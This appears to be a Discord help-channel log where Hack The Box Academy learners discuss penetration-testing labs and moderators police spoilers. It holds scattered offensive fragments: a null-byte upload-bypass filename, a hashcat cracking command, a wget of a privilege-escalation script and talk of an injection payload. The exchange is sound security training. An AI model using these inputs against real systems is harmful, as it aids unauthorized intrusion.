#modules

1 messages · Page 411 of 1

acoustic owl
#

The aim of CBBH is to find vulnerabilities in websites. It is not about gaining root access to a server. However, this is usually required in CTFs. In this case, CPTS would probably be more suitable

rustic sage
#

Yeah, I had the same problem as this guy the tools were spitting out unreliable data for some reason

dark hedge
#

that discrepancy is mentioned in the module

ocean night
#

@opaque walrus no spoilers please.

#

Mention the module, section and a brief question

#

Someone will reach out to you if they can

fathom pendant
opaque walrus
#

It was just a description of the lab...

fathom pendant
#

If rdp is slow, use tcp vpn, change vpn regions, or just suffer

ocean night
#

Fine.. just.. content being pasted like that

#

from modules over Tier 0

#

That's not ok

fathom pendant
ocean night
#

You did

fathom pendant
#

Ah yeah no, sharing the specifics of host details is spoiling

#

But the general setup is fine

opaque walrus
#

Spoiler was: Things are going to get interesting ! we are going to pivot and pwn internal hosts kinda

#

This is first time i saw such challenge. Mostly labs are standalone stuff

#

pretty cool!

primal trench
#

is it normal that i can´t open the hud in the zap proxy?

sand sedge
#

i'm stuck on a exercice FILE UPLOAD ATTACKS > white list filters

#

so i'm sending the file that is vulnerable and it says successfully uploaded

#

but when i try to access it it says internal error

#

this is my filename : hello.php\x00.png

ocean night
#

Please don't share too much

#

SPoilers for modules over Tier 0 are not allowed.

#

Read the channel topic

sand sedge
burnt jay
#

Good evening. I am at “attacking enterprise networks” -> “exploitation & privilege escalation”. While I try to connect to the internal http network there are very slow interactions. Is there something that I did wrong ? Or any tip to make it faster ?

ChatGPT told be to try local port forward instead of dynamic. I haven’t done it yet though.

ocean night
#

You shouldn't really ask for help with those modules..

#

Go back over the module / section documentation

jaunty vigil
#

u aren't allowed to ask for help in skill assessment?

ocean night
#

I mean.. that one.. it's right at the end of the course

#

If you're needing to ask for help with that, by that point...

#

I'd advise going back over the content, and trying to get through it yourself, otherwise you're going to find the exam very hard

jaunty vigil
#

if thats your opinion then you are allowed to have your own opinion but if its against the rule then i get it, but dont delete my message because you think i shouldnt ask for help

ocean night
#

I deleted it because you were going in the direction of providing spoilers.

#

You just need to accept that I'm afraid

jaunty vigil
#

okay anyone available to help question 1 skill assessmetn dacl attacks 2

#

feel free to dm

ocean night
#

Better, thank you.

jaunty vigil
#

i think it might just be broken, gna reset the lab

ocean night
#

fml

jaunty vigil
#

lol

ocean night
#

@subtle mauve ... seriously

#

Do not spoil modules over Tier 0

#

Did you not see the entire conversation above?

#

I guess not

#

Gonna go scream at a wall I guess

subtle mauve
ocean night
#

But what you typed spoiled content from a module over Tier 0

#

Read the channel subject

#

Read the ToS you agreed to

subtle mauve
ocean night
#

mb too if I'm aggro

#

Tired, frustrated and don't get how people miss it

#

But ok

digital sigil
#

Kinda funny, ngl

jaunty vigil
#

@ocean night do you have the answer to help me ?

#

or you just monitor make sure people dont spoil

dense gyro
#

Need help with windows lateral movement

#

Pls

ocean night
#

I don't have an answer for you, and my job isn't to monitor

#

I just like hanging here

#

..and protecting our interests

dense gyro
#

@ocean night can I please DM you my question?

ocean night
#

No, sorry @dense gyro

#

I can't help advise regarding content

dense gyro
#

Are we allowed to post question here?

#

Not the question itself but my question

ocean night
#

If it's regarding a Tier 0 module, go for it

#

If it's above Tier 0, do as @jaunty vigil did above

dense gyro
#

Dunno where to go, not that many postings on forum also

#

Where can I ask for tier 3

ocean night
#

You can ask in the style that gerbsec did above

#

You cannot post any spoiling content here.

subtle mauve
#

If anyone could help with question 3 skills assessment NTLM relay attacks that would be awesome, just dm me.

shut vapor
#

<@&861185840277487616>

#

idk what that was

ocean night
#

Wasn't watching

storm elk
#

Phishing’s bot

shut vapor
#

(but I wasn't clicking it)

ocean night
#

Aha, steamdouche

acoustic owl
last carbon
#

Hello I'm new and wondering if anyone can tell me the way to make the tools.list that is in the foundations setting up part?

last carbon
# fathom pendant Copy/paste

I'm probably missing something since I don't understand this. I could just copy paste that part but would it make the list or not do anything?

fathom pendant
#

.list is just a text file

last carbon
#

Ohh would it have a potential function? Or just to remember useful tools?

fathom pendant
#

sudo apt install -y < tools.list iirc should work

last carbon
#

I think I get the goal

fathom pendant
#

But the tools.list they give is by no means comprehensive

last carbon
#

Thanks for the info

#

I understand its to introduce this method thanks.

fathom pendant
#

Not really to introduce the method, more the concept

modest stream
#

hey guys
noob questions here, i am currenlty undergoing the pen tester path, i want to re-do a task have previously completed like getting a flag
if i click reset, will it only reset the machine and a new flag or reset all my progress in the penetration path

craggy edge
fathom pendant
#

It wouldn't be any good to have rotating/random flags for the learning content

modest stream
#

thank you so much

modest stream
modest stream
craggy edge
oblique tiger
#

Hi everyone, quick q:
Windows Privesc Module Assessment 1 - Machine has spawned but I can't reach it in any way. Pwnbox, local machine, changed the VPN server twice. Nothing is working. Any advice?

vivid mantle
oblique tiger
#

Last time this happened, changing the VPN server fixed the issue, but this time I can't connect in any way.

vivid mantle
#

yes, i can't reach it too

#

i will do the question maybe tomorror ....

craggy edge
oblique tiger
#

I’ll try. But pwnbox is also not working, so definitely not that.

craggy edge
oblique tiger
#

Thanks for the suggestion tho!

#

It’s the only assessment left before the last module. Would love to get it done today.

craggy edge
#

by last module you mean some cert?

oblique tiger
#

You bet! Excited and terrified at the same time lol

craggy edge
oblique tiger
#

I meant the “Attacking Enterprise Networks” module. It’s the closest thing to the actual CPTS exam I’ve heard.

But yea, I’m doing OSCP soon.

craggy edge
oblique tiger
#

Yep!!! Recently learned about that. I’ll definitely do that.

shadow latch
#

zephyr and dante are also recommended

calm swan
#

can we get an update in password attacks - password mutations module? the task at the end takes way too long for a little demonstration of the method... over 94k entries... shortened to 50k after considering password min length of 10...

fathom pendant
calm swan
#

but still, going through those takes A LOT of time

fathom pendant
#

I mean it's more "realistic"

calm swan
#

I mean yeaaah.. but 926 mutations of a SINGLE password is kinda too much imo

#

for a lab

fathom pendant
#

patience is a virtue ¯_(ツ)_/¯

calm swan
#

but not in the lab 😭

fathom pendant
#

Cracking and bruteforcing passwords is all about patience

fleet spear
#

but if you have done something wrong it will take very long time to figure out :=

fathom pendant
#

@burnt swallow This isn't a hacker4hire server; read the #rules

burnt swallow
#

Yes but i just want to know what i can do with it

fathom pendant
#

nothing that would be legal.

#

also this channel is for assistance with academy modules, not "how do i hack someone that hacked me"

bitter lintel
#

Hello, and tip on Windows Privilege Escalation Skills Assessment - Part I? I'm getting "Ping request could not find host rundll32.exe. Please check the name and try again.
Address:
"

fathom pendant
#

ping request

#

🤔

#

that means the thing running ping took rundll32.exe as it's argument

#

and tried looking it up via dns

bitter lintel
#

Ping request could not find host ;rundll32.exe. Please check the name and try again.

fathom pendant
#

so: something is wrong with your payload

burnt swallow
fathom pendant
#

if it's an account that has 0 to do with HTB; then it really doesn't belong in the discord

burnt swallow
#

Alr mb

fathom pendant
#

this is probably the thousandth time that i've had to tell people:
your account isn't truly your account, it still belongs to the company/product that you created the account for, this is true for nearly ANY service. Any issues you face with the account is to be resolved with the company/service, as hacking "your account" is still not legal. (not to mention there's virtually no way to verify that it is in fact your account).
All companies/services reserve the right to restrict/ban/delete your account per their ToS.

burnt swallow
#

👌

bitter lintel
mortal linden
#

Good evening all. I am trying to get through the file transfers module, and am trying to complete the second portion "Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer." I downloaded the provided zip file to my computer. I cannot figure out how to transfer it straight into pawnbox (the link to download is directly under the question, but if i inspect it, there isn't a link i can paste into the browser in pawnbox). i tried navigating to the page in pawnbox, but it wants me to log in there. I tried unzipping the provided file, copying the text, creating a text file in pawnbox, and then zipped it, and separately made a copy that i tar.gz'ed. i then scped them onto the target machine, ssh'ed there, used the gunzip command in the hint, and ran hasher, and my answer is incorrect, so i'm thinking i need to not unzip/copy/paste/rezip etc because somewhere in all of that clearly i'm changing something in the content. So, how can i transfer the zip file from my computer to pawnbox? (this is also a dedicated lab/enterprise modules, which might be why it's asking me to log in)

cloud urchin
mortal linden
#

& i can't log in because it says my company has turned on SSO, but then also doesn't recognize my university's domain...

safe star
mortal linden
safe star
#

the resources shouldnt need you to log in to download them

#

have you tried curl or wget

mortal linden
safe star
mortal linden
safe star
mortal linden
#

the green text. mine doesn't have a button.

safe star
#

is that enterprise?

mortal linden
#

it is.

safe star
#

mine is a button so there might be a link in the source for you to copy

mortal linden
#

ah! okay. lol. i got it transferred. wget worked. annnnd gunzip says it's not not in a gzip format so i'm right back to where i was.

safe star
#

just try normal zip

mortal linden
#

the target host doesn't have zip, and the hint suggested gunzip (with specific syntax). i'll figure out what this host has and keep trying. 🙂

fathom pendant
#

it's been a hot minute but i seem to recall that working

quiet halo
#

does anyone know why smbmap dosent work but smbclient does?

#

oh bc of it dosent support null auth?

waxen totem
spring compass
#

anyone else having a really bad connection tonight?

#

i have changed VPNs and reloaded the target, still having 30sec + response over ssh

cloud urchin
#

no issue here. did you try changing regions?

long flint
#

hi all, could i DM anyone about the syntax of my payload for the XML section of advanced deserialization attacks?

sour sedge
#

I'm currently working on the HTB Academy – Prompt Injection Attack module, specifically the Skill Assessment titled: "Obtain the flag by getting the CEO banned from their own website."

I've managed to complete most of the steps and I believe I'm really close to the solution. I’ve already found the admin key, but I’m stuck on the final part and can't seem to figure out how to actually get the CEO banned and obtain the flag.

If anyone has done this assessment and can give me a nudge in the right direction (without full spoilers), I’d really appreciate your help!

blazing tulip
#

Hi everyone 👋

#

I am currently on the penetrating testing path

#

I am currently in password attacks and using the pwnbox for solving the labs, how do I download the course resources in the pwnbox ?

#

Nevermind got it 👍

dusky valve
#

introduction to digital forensics
rapid triage examination & analysis tools

im on the part where they explain the general rules for timestamps in the NTFS file system. in the table for file access operation, it is noted that the accessed timestamp is no* but under the table in the text, it says the accessed timestamp is updated tor reflect the time of access i assumed the asterick to the no means like maybe it differs case by case? can someone explain :o or if i missed anything

not too sure if this is leaning towards spoilers for the module or not tbh, please delete if it is

thin citrus
#

I’m working through the HTTP Attacks module doing the Exploitation of Request Smuggling exercise, I have confirmed CL.TE vulnerability, used the basic payload from the course, add the additional parameters in the smuggled request and added my current cookie. But the Admin never hits the page or execute the payload. Can someone help me with this?

austere grail
#

how far should I get into academy before starting to solve HTB challenges/machines

#

im half way done through the foundations path and I am going to start the bug bounty path right after.

#

how much should I finish before I am able to start actually solving easy CTFs/machines?

fathom pendant
#

it all depends on how you tackle the content, if you look at the content as something to complete, it can take longer. If you look at the content as a way to build your methodology and understanding, then it won't take long at all

#

a lot of the easy stuff is a few quick google searches away

digital sigil
#

I (personally) feel that the boxes vary quite a bit in how guessy they are (that might have improved, has been quite a long time for me since I really did any), so you might be unlucky with one, while easily doing another

granite halo
#

Hello All - I just started htb and enjoying the same. Everytime starting VM and accessing the same from interactive session is not comfortable. Is it possible to access pawnbox from the Kali/Parrot linux installed in my local machine? Thanks in advance

digital sigil
#

You can use the VPN and get access to the network that way

dim path
#

Hi guys I am doing the modules for cpts path and am stuck in getting started in nibbles can anyone help me

granite halo
granite halo
#

Thanks again

granite halo
#

yes plesase

waxen totem
# dim path Can I DM
0xW1LD

Nibbles is running a nibble blog on port 80 which is hidden behind the nibbleblog directory. Through a directory fuzz we can find an admin panel and are able to login through guessing the admin password. The site is vulnerable to an authenticated file upload RCE which we use to get user shell on the box. After which we find a vulnerable privileg...

#

-# shameless self-plug kek

dim path
faint geode
drifting wren
#

Hi everyone, I'm currently on the 'Intrusion Detection With Splunk (Real-world Scenario)' and I just need clarification for the second question. I was able to find the answer as part of the CallTrace of a rundll32, but this one was using a lowercase 'system32' whereas the one with UNKNOWN segment in its CallTrace was in 'System32'. Was this an intentional part of the question? Sorry, I'm not sure how much detail I'm allowed to talk about.

glass locust
grand loom
#

Attacking WPA/WPA2 Wi-Fi Networks - Skills Assessment

on the last question it says

Connect to the StarLight-Protect Wi-Fi network and submit the flag found at 192.168.3.1.

worth 0 points but for some reason im unable to connect even tho i have the password

full wagon
#

Bloodhound. For the first time I have experienced problems with bloodhound-python, “channel-binding” errors when using it in HTB modules. Anyone have any tips on how to make it run? Will try using the —ldap-channel-binding flag once back from work but not sure if it will have any effect

gray yacht
full wagon
gray yacht
full wagon
gray yacht
grand loom
full wagon
modern haven
#

in the wordpress module there is inlanefreight.com ... and i get ip adres of the same.... what do i dont see? bc i have the admin pass. and i login the .com its not allowd. when i login on the given IP adress i dont get any Wordpress settings. any 1 can help me a bit ?

glass locust
# full wagon Thanks! I’ll check it out 👍

Just for general knowledge. There are multiple ingestors like RustHound/SOAPHound etc. You can also use something like ldapdomaindump and convert output to use with BH as well as things like ADExplorer etc. So there are many alternatives to generate appropriate .json files that you can later import.

full wagon
granite halo
#

one basic doubt. generally most of the systems deploy password policies like threshold for number of invalid passwords. if i give five wrong passwords, systems will lock the user. Our brute force tools like medusa, hydra will try reduced set of common passwords (still they are around 200). Any same system will not allow this kind of brute forcing. Then what purpose these tools are serving?

waxen totem
boreal cypress
#

I have a question regarding the Wi-Fi Evil Twin Module. Has anyone actually done the Assesment at the end? I managed to get the last question right but not the first two. I have litteraly tried everything and it wont work. On the first question there is a hint that says "Interception", i thought that well the only part where this word is mentioned is the SSL Interception section. Well, guess what? If you try to replicate that exact attack it still wont budge. So my question is has anyone managed to figure this and is able to help me out. I would appreciate that .

modern haven
glass locust
modern haven
glass locust
modern haven
#

last 1 Skills Assessment - WordPress

glass locust
modern haven
#

yeah, i will start over from 0 and see what goes wrong

wise galleon
#

Hi

regal sigil
#

I am doing the scf smb share attack, when running responder I am getting this error

fathom pendant
#

try without the r in -wrf :)

#

-wrf is a combination of -w, -r, and -f

regal sigil
#

i did but now

#

are the flags different in current version?

glass locust
#

I'm almost sure you can run without this flags at all, just with -I

dense mesa
#

Shameless copy/paste from @foggy siren : I'm stuck at the RDP and SOCKS Tunneling with SocksOver RDP with this error message: "The module SocksOverRDP-Plugin.dll was loaded but the call to DllRegisterServer failed with error code 0x80070005. What am I doing wrong?


I already disabled the real time protection I try to load the x64 version. Already resetted the target. Still can´t load the DLL. Do i miss something?

fathom pendant
#

after you disabled you need to make sure the dll exists where you drop it

dense mesa
#

Tried to get everything into one screenshot 🙂

#

Does the dll need to be registered with admin privileges? The modules only says that the socks server must be started with admin privileges.

//edit: registration works with admin privileges.
// edit 2: I see in the screenshot of the module that an admin cmd is used. I guess i will add something to #1234357888114364508 and ask for a little hint in the module that regsvr32.exe also requires admin privileges

glacial leaf
#

Hi! Very first post on this Discord, hope I'm in the right place. I'm trying to complete last question in the Linux Fundamentals: Filter Contents module, but I can't get the Pwnbox to connect to https://www.inlanefreight.com/ via cURL. The connection always times out. What could I be doing wrong?

glacial leaf
flint palm
#

Guys hello I know it is a stupid question but have you done network enumeration with nmap?

#

Find all TCP ports on your target. Submit the total number of found TCP ports as the answer.

glass locust
glass locust
flint palm
#

I give command nmap target ip -sS get 65535 ports but answer is incorrect and I am stuck what do they mean?

#

they asking about the total number of tcp ports

glass locust
#

Maybe with -Pn, not sure

flint palm
#

let me try

#

can you tell me the reason why nmap sometimes is so slow?

waxen hull
glass locust
flint palm
#

yeah it is still scanning

clever bone
#

Doing the pentesting in a nutshell model. Why does this keep timing out?

flint palm
#

better use your own kali on vm or live pwnbox is usually bad for use

clever bone
#

so its on the vm?

glass locust
clever bone
#

alr ill give it a try

dense mesa
#

How to use vs code

shadow grove
clever bone
flint palm
#

Guys nmap finished scanning but didn't list any output? Where is the output?

#

nmap -p- -sT -T5 --open 10.129.234.237
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-22 20:09 +04
Nmap done: 1 IP address (1 host up) scanned in 660.28 seconds

#

and that's all

#

trying right now))

#

could it be so that in virtual machine nmap is not working properly?

#

sU is about udp ports and I need tcp ports

#

the problem is that my nmap is not listing anything

#

scan results

#

no it doesn't work all

glass locust
idle sundial
#

#modules can anyone help me out on "introduction to NoSQL Injection at Skills Assessment II"?
any pointers will be greatly appreciated!

subtle mauve
plucky gale
#

Hello all. I'm new to HTB and to this channel. I did a couple of Sherlocks yesterday and was able to power through them. I am stuck on the "TeamWork" Sherlock and not sure if this is the place to get help. They are asking me to get the name of the file being shared by the advesary. But when I click on the link to get the file, there is a browser error saying DNS_PROBE_FINISHED_NXDomain as if the A record for the site doesn't exist. I can't complete this questions (and the box for that matter) without this information.

plucky gale
flint palm
# glass locust Try -Pn

trying right now. trying to guess why it gives no output for the scan. sometimes even tells that the host is down...

gray yacht
cosmic sentinel
subtle mauve
merry portal
#

Hello! I am pretty new to this field, so be kind plz.... 😛 I am going through the "setting up" module is the InfoSec foundations path. I am trying to spin up a windows 10vm, but the link provided in the course no longer supports download... I found a legit windows working link by searching on here and I was able to create an iso by downloading "windows installation media" . Unfortunately I am getting an error message at the Booting stage (Timeout error/ EFI Network.... No Media). Am I doing something wrong or do I just need to pay 20$ for an installation key?

shadow grove
#

Anyone who's done the Enterprise Networks module up for a quick DM to explain something? I've had a look at the walkthrough, so I know what to do but I don't know how I was supposed to work it out.

fathom pendant
obsidian shore
#

in intro to penetration testing, this question: """Which version of vsftpd is installed on the target system? (Format: x.y.z) """ but in the linpeas_results.txt file there isnt any vsftpd at all?

shadow grove
gaunt pewter
#

hey im trying to run the command wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh, but its failing to connect, the module explicitly says to run this command, so im not sure whats going wrong

#

im doing this inside the pwnbox

shadow grove
#

Are you running the command on the pwnbox parrot machine, or the target machine? The targets have no internet connection.

gaunt pewter
#

parrot

gaunt pewter
#

i have a fresh instantiation, so its even more weird

fathom pendant
dapper moth
#

Are you using the Pwnbox, the in-browser VM, or your own Parrot, "Pwnbox", installation?

fathom pendant
#

Sounds like dns issue

dapper moth
gaunt pewter
#

im in the browser

fathom pendant
#

(Or layer 8)

gaunt pewter
#

i can ping google fine

fathom pendant
gaunt pewter
#

yes free

fathom pendant
#

Then that may be why

#

The free pwnbox is very limited in internet access

gaunt pewter
#

i cant answer the questions without looking at the file linpeas_results.txt though :(

fathom pendant
#

Use your own vm :)

gaunt pewter
#

ive never done that but i suppose i can learn

#

can you point me to a resource?

fathom pendant
#

It's really not that hard to set up

#

There's a setting up module, and the popular distros all have basic guides to get you started

little birch
#

Hi. Where can I ask a question about Solar from Pro Labs?

fathom pendant
#

Pwnbox is a custom branch of ParrotOS

fathom pendant
gaunt pewter
#

ok, ill give it a shot thanks

little birch
#

@fathom pendant @dapper moth thanks

mortal linden
fathom pendant
#

gonna be honest then i forgot how i did it then; it's been a hot minute

#

but i swear there was a way to unzip it in a simple way

mortal linden
#

If there is anyone who is willing to have a sidebar with me, i've now got all of the commands i've run trying to finish this linux file transfer module and it is still not resulting in the right answer. I am utterly stuck, and actually need to finish this for a class. I'm really hoping someone can see an error.

fathom pendant
#

you can unzip then transfer it over unzipped

#

¯_(ツ)_/¯

mortal linden
#

i've also tried that, and still gotten the wrong answer. I'm utterly stumped, but think that the problem may be that i'm not actually successfully downloading the provided zip file into my attack box to begin with on pwnbox. i used wget, and actually got a file called the right thing, but it's content is html, not anything compressed or archived.

#

Of all the dumb things to be stuck on...this isn't even the point of the module lol

fathom pendant
#

i suggest instead to open network tab in browser; start the download in your host machine; go to network tab; click the download -> copy request

#

some things don't work well with the -> copy link

#

it depends on which endpoint the resource is held at

#

file transfer module yeah?

mortal linden
#

i'm sorry. i think my brain is broken. say what now? i can't navigate to the page where the file is saved on a browser in pwnbox at all. and yes, file transfer module, linux methods

fathom pendant
#

hm

mortal linden
#

i can't tell how much of this is harder because i'm in enterprise mode. it seems like i should be able to do it that way.

fathom pendant
#

i was able to right-click -> copy link and wget to my machine

mortal linden
#

right clicking i can't even copy the link

fathom pendant
#

gimme a sec to see if i can double check on EP;

mortal linden
#

and i inspected the page source and it's not in there either. 😦

#

okidoke!

glacial leaf
#

I'm trying to complete a module and I'm not understanding how the spawn rationing works on the free version. This morning when I checked, it said I had 1/1 spawn remaining so I planned to use it this evening. Now it says I have 0/1 and need to wait until tomorrow. What's happening here?

fathom pendant
compact patrolBOT
mortal linden
#

i could cry.

fathom pendant
#

yeah enterprise not showing the download seems a bit... ugh imho lol

ocean night
#

hm

#

Thought we ditched the in memory / blob download method

fathom pendant
fathom pendant
ocean night
#

Certain we moved some in-browser download and blob download triggering to be off of a CDN

#

and thought it was applied to Academy too

#

but perhaps I am mistaken

fathom pendant
#

a lot of the download stuff is under the /storage/ endpoint (if it's not under the >resources< button)

ocean night
#

Am I misunderstanding the problem?

fathom pendant
#

maybe

#

the problem they were having is they couldn't get a link to wget the file in the first place, regardless of where it's hosted

#

the enterprise platform opens a new tab to download, whereas the regular academy just allows you to right-click and copy link. Most browsers now though allow you to copy the download link location

#

[note the source says from enterprise, but the actual link is actually to the regular academy endpoint]

ocean night
#

Ok yeah, must still be differences in the EP academy integration

#

A /feedback certainly wouldn't go amiss

#

..but know there's a lot in progress atm

fathom pendant
#

my critique is mostly on the fact that the question from the section implies the target host has a way to unzip the upload_nix.zip, it doesn't (tar -xvf errors)

ocean night
#

huh

#

but, it's a zip?

#

Oh, no unzip bin?

fathom pendant
#

nerp. even the official solution says to download the zip file and unzip on their local machine then transfer

glacial leaf
ocean night
#

You will still be able to spawn the targets

fathom pendant
#

¯_(ツ)_/¯

glacial leaf
#

Exactly

ocean night
#

Understood, I mis-read what was said then, mb

fathom pendant
#

annnd now i forgor what i was doing kek

ocean night
#

Looks like you spawned on the 22nd just before the servers midnight

#

What I'm seeing our side anyway, not sure support will be able to say anything in addition tbh.. but see what they say in the morning when they are back online

glacial leaf
#

What time zone are the servers on?

ocean night
#

Sorry, just after 0100 yesterday, not midnight

#

So you've a few hours until your next credit

#

UTC

glacial leaf
#

Gotcha. I'll keep that in mind. Maybe the page I was looking at wasn't refreshed? I don't know why else it would show me as having available spawns when I didn't.

fathom pendant
#

probably a caching issue

ocean night
#

Hmm, possibly

#

Not sure to be honest, but certainly mention on your ticket

#

That kind of time sensitive things should be cached with their time limits taken in to account though

#

should

fathom pendant
#

depends sometimes; i've had labs timeout because it didn't update the timer (though i think there's a polling update that should update it, it does sometimes get missed)

ocean night
#

Cache lifetime defined based upon the regularity of data change, so any changes to a long lived cached object sh ould be invalidated when a change impacts it

#

e.g. change in last spawn time of pwnbox

#

Again... should

#

Taking a note

sacred patio
#

Hi guys I hope you are okay. I'm in the Cracking passwords with hashcat module in the hybrid section where they ask me to decrypt a hash with a mask. I made the identification with hashid and identified a SHA1. I used the seclist from this repository https://github.com/danielmiessler/SecLists unzipping Rockyou.txt and using these lines in the console to decrypt the hash echo 978078e7845f2fb2e20399d9e80475bc1c275e06 > hash5.txt hashcat -a 6 -m 100 hash5.txt /usr/share/wordlists/rockyou.txt '?d?s'. However, I get starus exhausted or it takes more than 5 minutes to decipher the hash. Has anyone used a different dictionary or can someone help me with a clue? I appreciate your help. sadglas prayge

GitHub

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, pas...

rustic sage
#

Anyone in the future doing the skills assessment for the active Directory bloodhound. Find the percentage of users with a path to global administrator. Use a cypher query and modify it to azure. Simple. Bloodhound will fuck you up, and waste your time

#

Lesson learned don’t ignore cypher queries. I will use them from now on. I’ve always ignored it and went to bloodhound

#

I will admit when I’m wrong

#

Grindr, they have pentesters that are on their grind. Download the app it’s a great forum

cloud urchin
#

No, and not the server to discuss such things.

rustic sage
#

Owch

#

Evaporated

#

Supernuts doesn’t play

cloud urchin
#

Just deleted the msg is all

rustic sage
#

Better than what tcm does they will just take your cert

#

Hehehehehe

rustic sage
#

How do you guys divvy up the work and moderate? It seems like a lot of work to just sit and moderate a chat. I’m genuinely curious.

cloud urchin
#

A better discussion for #general but no, no shifts or anything. Just online whenever.

tiny frigate
#

#1341071199773655060 message

Looks like someone got stuck at a similar spot as me right now.
Not sure if they came here? Having trouble answering a question in the Web Recon module, though I am positive I got it (the "Solutions" show me a screenshot of the page I'm supposed to visit on WayBack, censoring the answer, and that's right where I'm looking)...

Gonna sleep on it, but if someone has an idea ^^

long flint
#

hi all, for advanced deserialization attacks xml section, i am very confused on where to add the string for the Type class generated from AssemblyQualifiedName in csharp. I am able to follow the module perfectly until 'Exploiting TeeTrove' section.

gritty python
#

If anyone else is facing similar issue, make sure to add checks according to hints inside try - catch block where the main function is being invoked, otherwise it didn't work for me

acoustic owl
#

@idle sundial I deleted your post because it contains spoilers. If you still need help with the module, send me a dm

long flint
#

i got it just like 2 minutes ago.. QQ lol after a couple of days. had a huge misunderstanding

long kestrel
golden gate
#

hello anyone here?

waxen totem
golden gate
#

im not attending the Introduction to Windows Command Line

golden gate
golden gate
#
C:\Windows\System32>schtasks /query /tn move_these_pics /v /fo list

Folder: \
HostName:                             AHMAD_23
TaskName:                             \move_these_pics
Next Run Time:                        N/A
Status:                               Queued
Logon Mode:                           Interactive only
Last Run Time:                        4/23/2025 11:56:46 AM
Last Result:                          0
Author:                               AHMAD_23\ahmad
Task To Run:                          cmd.exe /c robocopy C:\Users\ahmad\Documents\MEGA\obsidian C:\Users\ahmad\Documents\MEGA\obsidian\pics *.png /XO /MOV /XC
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          ahmad
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A
#

this is it and idk what is wrong

#

can someone help pls

#

quick update

#

it only run when the laptop is on charger

#

also how to fix

snow zodiac
#

i'm working on the tcpdump fundamentals labs but the right answer doesnt register as correct and keeps saying its wrong what are some known fixes? ill add a screenshot

waxen totem
golden gate
#

yea i was googling about this
i need to turn it off

#

thx

jolly yacht
#

Hey i tried running nmap -sS stealth scan without mentioning sudo in the kali linux OS and it is running Stealth scan without requiring sudo privileges but in the "Network Enumeration using NMAP" module, the author mentioned nmap stealth scan requires raw socket privileges to perform scan. In my case, how it is working? i was really confused and i asked chatgpt about it and it responded to check if nmap binary has suid bit assgined and it was also not assigned.

craggy edge
tiny frigate
light arrow
#

android fundamentals:

cobalt garnet
#

Hello, I'm currently working on the "Shells&payloads" module's live engagement, I'm a little ashamed to ask this (but hey we're here to learn) and I have no clue on how to access a web page (from the foothold box, not from the pwnbox) without any web browser installed on the machine. Am I missing something here ? (I tried xdg-open with the address, but I just get the source code of the page and it's not very helpful).

austere grail
waxen totem
#

If you have pivoting knowledge you can also establish a tunnel and use the browser on your own pwnbox/vm

cobalt garnet
#

OMG! I've been searching in the menu to launch it from there for several minutes. Thanks a lot! 😅

#

Yes I know tunneling is possible but I don't have the knowledge yet

fathom pendant
austere grail
fathom pendant
#

the same way others solve active machines: research

#

:P academy doesn't cover every single topic and vulnerability

tiny frigate
fathom pendant
#

but they cover enough to build you up with the research skills

dark hedge
fathom pendant
#

this is why i put in the caveat to my initial message:

  • If you look at academy modules as something to just complete, you're cooked
  • If you look at it as a way of building your methodology and understanding, you're gonna do better
tiny frigate
#

Personally I read a few walkthroughs to and spend a lot of time in Academy, still do. You get a sense for generall concepts you need over and over again, so starting from there, you can build your knowledge further and try to apply it on active machines

austere grail
tiny frigate
fathom pendant
austere grail
#

or demotivating myself

tiny frigate
fathom pendant
#

reading walkthroughs isn't inherently bad; it's just how you use it

fathom pendant
fathom pendant
waxen totem
tiny frigate
fathom pendant
#

reframing how you view it is important as well

tiny frigate
#

I still consider myself pretty much a noob, just as a disclaimer by the way ^^

fathom pendant
#

sure it may take you a few hours or days to solve a box: but at the end you learned something

glass locust
fathom pendant
#

you should concern yourself with speed after you've gotten a hold of the basics

fathom pendant
#

if you're worried about completing the boxes as fast as the extremely skilled people that get bloods, then you're trying to climb a steep hill without any practice

waxen totem
fathom pendant
#

the modules teach you, in part, the methodology to identify the weakness -- not just that a weakness is there

tiny frigate
# austere grail then still the question remains, when do i know i reached this "balance" point

Maybe "balance" was not the best way to put it, I just meant to express that I felt like being in a very similar spot.
If the first thing on HTB is spawning a machine, even from starting point, if you've hardly even ever seen a Linux CLI (as myself a few months ago), then you're not gonna have a good time.
But you don't have to finish every last Academy module either to get started.

I'd really say to try it out. Maybe stick to some paths in Academy (another mistake I made, I kinda randomly took modules that didn't mesh well / went way over my head at first), and you're gonna get more and more comfortable.

Wishing you a great journey either way, you got this, and most importantly: enjoy the ride hugthebox

austere grail
#

ill finish fundementals and do some modules from the CBBH path and ill try some boxes from there

waxen totem
austere grail
#

thank you everyone for the help. yall the 🐐 s

tiny frigate
digital pendant
#

Tho its not usually this slow are there ongoing server issues with spawning targets?

tiny frigate
digital pendant
#

Seems it timed out and I clicked spawn again which created < 60s so I guess it was having a moment

fathom pendant
#

@digital pendant be careful with sharing images that contain answers

digital pendant
#

idk what I shared now but my bad

mighty shell
#

Hello, have anyone completed Hacking wordpress module?
actually having problem with the question -> Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

fathom pendant
digital pendant
#

Lesson learned!! thanks Marcie

tiny frigate
digital pendant
#

I got dm'ed too it seems.

fathom pendant
gloomy stump
#

Hello, I have a question on Attacking common services, the Attacking Email Services, can someone give me a hint on finding the password?

digital pendant
#

@mighty shell which specific section of the wordpress module are you stuck on ?

mighty shell
#

Cause since i received some Dms asking for help so i thought theirs nothing wrong in it, sorry my bad @fathom pendant

uneven obsidian
#

I just finished the Pasword Attacks Lab - Easy ,
How long did it take for you to crack the password and how many threads have you used ?

mighty shell
#

@digital pendant The skill assesment part

#

@digital pendant I got the Shell of erika but couldn't figure out where the flag for this question is
Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

digital pendant
#

